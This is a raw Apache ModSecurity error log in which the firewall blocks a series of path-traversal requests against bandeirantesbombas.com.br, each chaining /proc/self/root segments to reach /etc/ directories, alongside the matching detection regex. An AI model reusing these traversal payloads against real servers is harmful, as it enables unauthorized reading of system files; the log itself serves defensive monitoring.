[Fri Mar 20 03:41:41.042124 2026] [:error] [pid 7235:tid 140411725141760] [client 74.7.241.31:50332] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsJfqxLDW4GITHUkSw5QAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:42.425628 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.243.128:56244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsJvXLqtnMIWvjpaJoOQAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:45.518635 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.241.31:50340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsKfqxLDW4GITHUkSw6wAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:46.954974 2026] [:error] [pid 11167:tid 140411616036608] [client 74.7.241.31:50356] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsKvHIg5MgXLBnicPK1AAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:49.315996 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.241.31:52022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsLfXLqtnMIWvjpaJoQQAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:50.634538 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:52032] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsLta6ubjKNq_cu4adfwAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:51.968710 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:52034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsL9a6ubjKNq_cu4adggAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:42:04.642986 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.241.31:52036] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsPPXLqtnMIWvjpaJoUAAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:42:09.319919 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.241.31:40836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsQfqxLDW4GITHUkSw_AAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:42:24.616039 2026] [:error] [pid 11642:tid 140411658000128] [client 74.7.243.128:56256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsULninkcc-iUj5AotJAAAA4o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:42:33.457773 2026] [:error] [pid 21219:tid 140411607643904] [client 74.7.243.128:45374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsWfXLqtnMIWvjpaJocQAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:42:39.360738 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:45162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsX9a6ubjKNq_cu4adqAAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:42:46.009151 2026] [:error] [pid 11642:tid 140411590858496] [client 74.7.243.128:50488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsZrninkcc-iUj5AotNQAAA5I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:42:47.291409 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.243.128:50492] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsZxCii7xarUs8iHYzWAAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:42:57.583101 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.241.31:51330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzscRCii7xarUs8iHYzbgAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:43:02.315373 2026] [:error] [pid 9818:tid 140411599251200] [client 74.7.241.31:47180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsdl1pVZ5mVmJwsFMA-wAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:43:19.426146 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:47188] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzshta6ubjKNq_cu4adzwAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:43:20.711542 2026] [:error] [pid 31215:tid 140411658000128] [client 74.7.241.31:57316] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsiAF0L0L-SsrnPo43bgAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:43:26.713599 2026] [:error] [pid 11167:tid 140411548894976] [client 74.7.241.31:57332] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsjvHIg5MgXLBnicPLEAAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:43:37.759625 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.243.128:50506] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsmRCii7xarUs8iHYznAAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:43:39.444502 2026] [:error] [pid 31215:tid 140411699963648] [client 74.7.241.31:55838] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsmwF0L0L-SsrnPo43ggAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
